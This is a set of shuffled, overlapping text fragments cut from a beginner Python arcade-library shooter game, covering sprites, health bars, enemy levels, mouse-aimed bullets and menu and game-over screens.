"enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all sprites self.bullet_list.update() if len(self.enemy_list) == 0",
"0: self.level = self.updated_level + 1 else: self.good = False else: for i",
"sprite if not isinstance(player, PLAYER): raise TypeError(\"List contents must be all ints\") #",
"Draw how many health the enemies have health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25",
"== 0: self.window.level = self.updated_level + 1 else: self.good = False def setup(self):",
"width=200, height=50, color=WHITE) def on_mouse_press(self, _x, _y, _button, _modifiers): \"\"\" Use a mouse",
"bullet.left > self.width: bullet.remove_from_sprite_lists() def main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\") menu_view",
"self.change_y # Check for out-of-bounds if self.left < 0: self.left = 0 elif",
"color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw the health bar # Draw the red background",
"# Add extra attributes for health self.enemy_max_health = enemy_max_health self.enemy_cur_health = enemy_max_health def",
"< self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) # Calculate width based",
"the enemy to the lists self.enemy_list.append(enemy) if self.enemy_list == 0: self.window.level = self.updated_level",
"if not isinstance(player, PLAYER): raise TypeError(\"List contents must be all ints\") # Remove",
"self.enemy_health3 = 10 self.good = True self.window.level = 1 self.updated_level = -1 self.amount_of_enemies",
"remove it. if bullet.bottom > self.width or bullet.top < 0 or bullet.right <",
"def on_update(self, delta_time): \"\"\" Movement and game logic \"\"\" self.player_sprite.change_x = 0 self.player_sprite.change_y",
"the sprite rotation. Change this, and the sprite rotates. self.angle += self.change_angle def",
"bullet.center_x = start_x bullet.center_y = start_y # Get from the mouse the destination",
"+ 1 else: self.good = False def setup(self): # Set up the game",
"key == arcade.key.LEFT: self.left_pressed = True elif key == arcade.key.RIGHT: self.right_pressed = True",
"up the game # Sprite lists self.window.level = 1 self.player_list = arcade.SpriteList() self.enemy_list",
"angle = math.atan2(y_diff, x_diff) # Taking into account the angle, calculate our change_x",
"= math.sin(angle) * BULLET_SPEED # Add the bullet to the lists self.bullet_list.append(bullet) def",
"import random import arcade import math import os from arcade.color import BLACK, WHITE",
"\"\"\" def on_show(self): \"\"\" Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self):",
"- 1: self.top = SCREEN_HEIGHT - 1 class ENEMY(arcade.Sprite): def update(self): # Rotate",
"= 0 if self.up_pressed and not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed and",
"0 elif self.top > SCREEN_HEIGHT - 1: self.top = SCREEN_HEIGHT - 1 class",
"self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208 start_y = 270 arcade.draw_text(\"Use the",
"the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy",
"290 start_y = 270 arcade.draw_text(f\"You died in level: {self.window.level}\", start_x, start_y, arcade.color.RED, 20)",
"player_max_health def player_draw_health_number(self): # Draw how many health the enemies have health_string =",
"start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw the",
"arcade.draw_text(\"Use the arrow keys on your keyboard to move around\", start_x, start_y, arcade.color.RED,",
"= True elif key == arcade.key.DOWN: self.down_pressed = True elif key == arcade.key.LEFT:",
"= math.cos(angle) * BULLET_SPEED bullet.change_y = math.sin(angle) * BULLET_SPEED # Add the bullet",
"enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all sprites self.bullet_list.update() if len(self.enemy_list)",
"= 220 start_y = 370 arcade.draw_text(\"Shooter Game\", start_x, start_y, arcade.color.WHITE, 50) self.player_sprite =",
"attributes for health self.player_max_health = player_max_health self.player_cur_health = player_max_health def player_draw_health_number(self): # Draw",
"370 arcade.draw_text(\"Shooter Game\", start_x, start_y, arcade.color.WHITE, 50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x",
"= -10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite): def __init__(self, image,",
"super().__init__() # Variables that will hold sprite lists self.player_list = None self.enemy_list =",
"to the main menu view \"\"\" if key == arcade.key.ESCAPE: menu_view = MenuView()",
"dest_y - start_y angle = math.atan2(y_diff, x_diff) # Taking into account the angle,",
"= random.randrange(120, SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the",
"+ 1 else: self.good = False else: for i in range(self.amount_of_enemies): # Create",
"player around the screen self.center_x += self.change_x self.center_y += self.change_y # Check for",
"= 0.5 SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT =",
"# update all sprites self.bullet_list.update() if len(self.enemy_list) == 0 and self.window.level > self.updated_level:",
"calculate our change_x # and change_y. Velocity is how fast the bullet travels.",
"self.amount_of_enemies += 2 #self.enemy_health += 1 self.speed += .20 arcade.play_sound(self.newLevel_sound) for enemy in",
"player_draw_health_number(self): # Draw how many health the enemies have health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x",
"SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw all the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output =",
"update(self): \"\"\" Move the player \"\"\" # Move player around the screen self.center_x",
"0 or bullet.right < 0 or bullet.left > self.width: bullet.remove_from_sprite_lists() def main(): window",
"= start_y # Get from the mouse the destination location for the bullet",
"enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the",
"Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2,",
"flies off-screen, remove it. if bullet.bottom > self.width or bullet.top < 0 or",
"arcade.draw_text(\"Shooter Game\", start_x, start_y, arcade.color.WHITE, 50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x =",
"def on_key_release(self, key, modifiers): \"\"\"Called when the user releases a key. \"\"\" if",
"many health the enemies have health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25 start_y =",
"health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH",
"arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\") menu_view = MenuView() window.show_view(menu_view) arcade.run() window.level = 0 #",
"+= min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif self.center_y > player_sprite.center_y: self.center_y -= min(SPRITE_SPEED, self.center_y",
"player_max_health self.player_cur_health = player_max_health def player_draw_health_number(self): # Draw how many health the enemies",
"player_max_health): super().__init__(image, scale) # Add extra attributes for health self.player_max_health = player_max_health self.player_cur_health",
"= dest_x - start_x y_diff = dest_y - start_y angle = math.atan2(y_diff, x_diff)",
"# Loop through each bullet for bullet in self.bullet_list: # Check this bullet",
"in self.bullet_list: # Check this bullet to see if it hit a enemy",
"# Calculate width based on health start_x = 85 start_y = 25 health_width",
"_modifiers): \"\"\" If user hits escape, go back to the main menu view",
"PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208 start_y = 270 arcade.draw_text(\"Use the arrow keys",
"random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) enemy3.center_x",
"based on health health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5",
"MenuView() self.window.show_view(menu_view) class MyGame(arcade.View): \"\"\" Main application class. \"\"\" def __init__(self): \"\"\" Initializer",
"self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound",
"HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED = 5 class",
"50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208 start_y = 270 arcade.draw_text(\"Use",
"the game over view \"\"\" arcade.start_render() arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED, 100, anchor_x=\"center\")",
"enemies have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12,",
"color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key, modifiers): \"\"\"Called whenever a key is",
"if self.center_x < player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x) elif self.center_x >",
"= False self.right_pressed = False self.up_pressed = False self.down_pressed = False self.width =",
"class has an \"angle\" attribute that controls # the sprite rotation. Change this,",
"from arcade.color import BLACK, WHITE SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2 =",
"key, _modifiers): \"\"\" If user hits escape, go back to the main menu",
"= arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position the bullet at the player's current location start_x",
"# start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE) def",
"to advance to the 'game' view. \"\"\" game_view = MyGame() game_view.setup() self.window.show_view(game_view) arcade.run()",
"= True def on_key_release(self, key, modifiers): \"\"\"Called when the user releases a key.",
"enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) enemy3.center_x =",
"on health start_x = 85 start_y = 25 health_width = (HEALTHBAR_WIDTH +50) *",
"self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT + 10,",
"SCREEN_HEIGHT, self.background) # Draw all the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output = f\"Level:",
"self.right > SCREEN_WIDTH - 1: self.right = SCREEN_WIDTH - 1 # Make sure",
"scale) # Add extra attributes for health self.player_max_health = player_max_health self.player_cur_health = player_max_health",
"25 start_y = 40 arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12)",
"off the screen if self.bottom < 0: self.bottom = 0 elif self.top >",
"+ HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) # Calculate width based on health health_width =",
"= 0 elif self.right > SCREEN_WIDTH - 1: self.right = SCREEN_WIDTH - 1",
"enemy_max_health self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self): # Draw how many health the enemies",
"elif key == arcade.key.RIGHT: self.right_pressed = False def on_draw(self): # render the screen",
"x dest_y = y # Do math to calculate how to get the",
"font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw the health bar # Draw the red",
"arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE) def on_mouse_press(self, _x, _y, _button, _modifiers): \"\"\" Use",
"main guy if self.center_y < player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif",
"to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the game over view \"\"\"",
"one health point player.player_cur_health -= 1 # Check health if player.player_cur_health <= 0:",
"start\", start_x, start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE) def on_mouse_press(self, _x,",
"self.center_y += self.change_y # Check for out-of-bounds if self.left < 0: self.left =",
"modifiers): \"\"\"Called when the user releases a key. \"\"\" if key == arcade.key.UP:",
"600 SCREEN_TITLE = \"Shooter Game\" SPRITE_SPEED = 0.20 BULLET_SPEED = 5 HEALTHBAR_WIDTH =",
"height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def update(self): \"\"\" Move the player \"\"\" # Move",
"not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed and not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED",
"# start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw the",
"Class to manage the game over view \"\"\" def on_show(self): \"\"\" Called when",
"\"\"\" Movement and game logic \"\"\" self.player_sprite.change_x = 0 self.player_sprite.change_y = 0 if",
"we hit, process for enemy in hit_list: # Make sure this is the",
"SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT = 15 SCREEN_WIDTH = 800 SCREEN_HEIGHT = 600 SCREEN_TITLE",
"MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite): def __init__(self, image, scale, player_max_health): super().__init__(image, scale) #",
"/ self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH - health_width), center_y=self.center_y - 10, width=health_width,",
"if self.left_pressed and not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed and not self.left_pressed:",
"0.5 SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT = 15",
"Make sure he cant go off the screen if self.bottom < 0: self.bottom",
"and not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for",
"= 15 SCREEN_WIDTH = 800 SCREEN_HEIGHT = 600 SCREEN_TITLE = \"Shooter Game\" SPRITE_SPEED",
"def on_key_press(self, key, _modifiers): \"\"\" If user hits escape, go back to the",
"1: self.top = SCREEN_HEIGHT - 1 class ENEMY(arcade.Sprite): def update(self): # Rotate the",
"the bullet flies off-screen, remove it. if bullet.bottom > self.width or bullet.top <",
"elif self.center_y > player_sprite.center_y: self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y) if self.center_x <",
"dest_y = y # Do math to calculate how to get the bullet",
"BLACK, WHITE SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3 =",
"ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3)",
"MyGame(arcade.View): \"\"\" Main application class. \"\"\" def __init__(self): \"\"\" Initializer \"\"\" # Call",
"arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the game over view \"\"\" arcade.start_render() arcade.draw_text(\"Game Over!\\n\",",
"SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED, 100, anchor_x=\"center\") start_x = 290 start_y = 270 arcade.draw_text(f\"You died",
"= self.player_sprite.center_y bullet.center_x = start_x bullet.center_y = start_y # Get from the mouse",
"# Not dead arcade.play_sound(self.playerDeath_sound) # Loop through each bullet for bullet in self.bullet_list:",
"start_x = 290 start_y = 270 arcade.draw_text(f\"You died in level: {self.window.level}\", start_x, start_y,",
"= 330 start_y = 110 arcade.draw_text(\"Click to start\", start_x, start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395,",
"self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in",
"point player.player_cur_health -= 1 # Check health if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over",
"the enemies have health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25 start_y = 40 arcade.draw_text(health_string,",
"15) start_x = 360 start_y = 210 arcade.draw_text(\"Click to Shoot\", start_x, start_y, arcade.color.RED,",
"enemy_max_health def enemy_draw_health_number(self): # Draw how many health the enemies have health_string =",
"in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite)",
"= -10 HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite):",
"start_x, start_y, arcade.color.RED, 15) start_x = 360 start_y = 210 arcade.draw_text(\"Click to Shoot\",",
"the bullet travels. bullet.change_x = math.cos(angle) * BULLET_SPEED bullet.change_y = math.sin(angle) * BULLET_SPEED",
"Movement and game logic \"\"\" self.player_sprite.change_x = 0 self.player_sprite.change_y = 0 if self.up_pressed",
"health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def",
"arcade.color.WHITE, 25, anchor_x=\"center\") def on_key_press(self, key, _modifiers): \"\"\" If user hits escape, go",
"advance to the 'game' view. \"\"\" game_view = MyGame() game_view.setup() self.window.show_view(game_view) arcade.run() class",
"dead arcade.play_sound(self.playerDeath_sound) # Loop through each bullet for bullet in self.bullet_list: # Check",
"> player_sprite.center_x: self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def __init__(self, image, scale, enemy_max_health):",
"self.window.level <= 3: for i in range(self.amount_of_enemies): # Create the enemy image enemy",
"len(hit_list) > 0: bullet.remove_from_sprite_lists() # For every enemy we hit, process for enemy",
"math to calculate how to get the bullet to the destination. x_diff =",
"health point enemy.enemy_cur_health -= 1 # Check health if enemy.enemy_cur_health <= 0: #",
"def player_draw_health_bar(self): # Draw the health bar # Draw the red background start_x",
"# Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list == 0:",
"if self.up_pressed and not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed and not self.up_pressed:",
"= 10 self.good = True self.window.level = 1 self.updated_level = -1 self.amount_of_enemies =",
"if key == arcade.key.ESCAPE: menu_view = MenuView() self.window.show_view(menu_view) class MyGame(arcade.View): \"\"\" Main application",
"sprite if not isinstance(enemy, ENEMY): raise TypeError(\"List contents must be all ints\") #",
"setup(self): # Set up the game # Sprite lists self.window.level = 1 self.player_list",
"health bar # Draw the red background if self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y",
"random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y",
"random.randrange(120, SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy",
"this is the right sprite if not isinstance(enemy, ENEMY): raise TypeError(\"List contents must",
"hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it did, get rid of the bullet",
"0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over) arcade.run() # enemy dead player.remove_from_sprite_lists() else: #",
"hit_list: # Make sure this is the right sprite if not isinstance(enemy, ENEMY):",
"enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2)",
"> self.width: bullet.remove_from_sprite_lists() def main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\") menu_view =",
"to go to the main guy if self.center_y < player_sprite.center_y: self.center_y += min(SPRITE_SPEED,",
"the angle, calculate our change_x # and change_y. Velocity is how fast the",
"True elif key == arcade.key.RIGHT: self.right_pressed = True def on_key_release(self, key, modifiers): \"\"\"Called",
"10, color=arcade.color.GREEN) def update(self): \"\"\" Move the player \"\"\" # Move player around",
"5 class PLAYER(arcade.Sprite): def __init__(self, image, scale, player_max_health): super().__init__(image, scale) # Add extra",
"health bar # Draw the red background start_x = 120 start_y = 35",
"0: self.window.level = self.updated_level + 1 arcade.play_sound(self.newLevel_sound) else: self.good = False elif self.window.level",
"self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x = 400 self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite) self.levels()",
"cant go off the screen if self.bottom < 0: self.bottom = 0 elif",
"variable self.background = None def levels(self): while self.good: if self.window.level >= 0 and",
"3 and self.window.level < 6: for i in range(self.amount_of_enemies): # Create the enemy",
"1 # Check health if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over)",
"elif key == arcade.key.RIGHT: self.right_pressed = True def on_key_release(self, key, modifiers): \"\"\"Called when",
"__init__(self): \"\"\" Initializer \"\"\" # Call the parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE)",
"arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\")",
"self.good = True self.levels() self.amount_of_enemies += 2 #self.enemy_health += 1 self.speed += .20",
"in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x,",
"the health bar # Draw the red background start_x = 120 start_y =",
"based on health start_x = 85 start_y = 25 health_width = (HEALTHBAR_WIDTH +50)",
"= 25 start_y = 40 arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE,",
"enemy we hit, process for enemy in hit_list: # Make sure this is",
"color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\" Class that manages the 'menu' view. \"\"\" def on_show(self):",
"arcade.draw_text(\"Click to start\", start_x, start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE) def",
"\"\"\" Draw the game over view \"\"\" arcade.start_render() arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED,",
"= x dest_y = y # Do math to calculate how to get",
"MenuView() window.show_view(menu_view) arcade.run() window.level = 0 # game = MyGame() # game.setup() #",
"- 0.5 * (HEALTHBAR_WIDTH - health_width), center_y=self.center_y - 10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class",
"will be stored in this variable self.background = None def levels(self): while self.good:",
"self.player_sprite = None self.enemy_health = 2 self.enemy_health2 = 5 self.enemy_health3 = 10 self.good",
"the sprite rotates. self.angle += self.change_angle def follow_sprite(self, player_sprite): # This tells the",
"be stored in this variable self.background = None def levels(self): while self.good: if",
"= 400 self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite) self.levels() # Set the background color self.background",
"self.player_list.append(self.player_sprite) self.levels() # Set the background color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key,",
"+ 10, color=arcade.color.GREEN) def update(self): \"\"\" Move the player \"\"\" # Move player",
"_x, _y, _button, _modifiers): \"\"\" Use a mouse press to advance to the",
"# Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) # Position the",
"enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y",
"all sprites self.bullet_list.update() if len(self.enemy_list) == 0 and self.window.level > self.updated_level: self.window.level +=",
"game over view \"\"\" def on_show(self): \"\"\" Called when switching to this view\"\"\"",
"If user hits escape, go back to the main menu view \"\"\" if",
"when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the menu \"\"\"",
"the player \"\"\" # Move player around the screen self.center_x += self.change_x self.center_y",
"Draw all the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output = f\"Level: {self.window.level}\" arcade.draw_text(output, 12,",
"bullet if len(hit_list) > 0: bullet.remove_from_sprite_lists() # For every enemy we hit, process",
"view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the menu \"\"\" arcade.start_render() start_x = 220",
"player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) > 0: enemy.remove_from_sprite_lists() for player in player_hit:",
"400 self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite) self.levels() # Set the background color self.background =",
"player_sprite.center_x - self.center_x) elif self.center_x > player_sprite.center_x: self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x)",
"player_max_health=10) start_x = 208 start_y = 270 arcade.draw_text(\"Use the arrow keys on your",
"- health_width), start_y , width=health_width + 10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def update(self):",
"view \"\"\" def on_show(self): \"\"\" Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def",
"HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) # Calculate width based on",
"sure this is the right sprite if not isinstance(enemy, ENEMY): raise TypeError(\"List contents",
"menu_view = MenuView() window.show_view(menu_view) arcade.run() window.level = 0 # game = MyGame() #",
"arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False self.right_pressed = False self.up_pressed = False",
"len(self.enemy_list) == 0 and self.window.level > self.updated_level: self.window.level += 1 self.good = True",
"i in range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health)",
"= None def levels(self): while self.good: if self.window.level >= 0 and self.window.level <=",
"= enemy_max_health self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self): # Draw how many health the",
"width=health_width + 10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def update(self): \"\"\" Move the player",
"0.5 * (HEALTHBAR_WIDTH - health_width), start_y , width=health_width + 10, height=HEALTHBAR_HEIGHT + 10,",
"the lists self.enemy_list.append(enemy) if self.enemy_list == 0: self.window.level = self.updated_level + 1 arcade.play_sound(self.newLevel_sound)",
"self.player_list = arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER,",
"Check this bullet to see if it hit a enemy hit_list = arcade.check_for_collision_with_list(bullet,",
"0 or bullet.left > self.width: bullet.remove_from_sprite_lists() def main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter",
"= 120 start_y = 35 if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y",
"= 35 if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH",
"player_sprite.center_y) if self.center_x < player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x) elif self.center_x",
"= arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it did, get rid of the bullet if",
"contents must be all ints\") # Remove one health point enemy.enemy_cur_health -= 1",
"not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed and not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED",
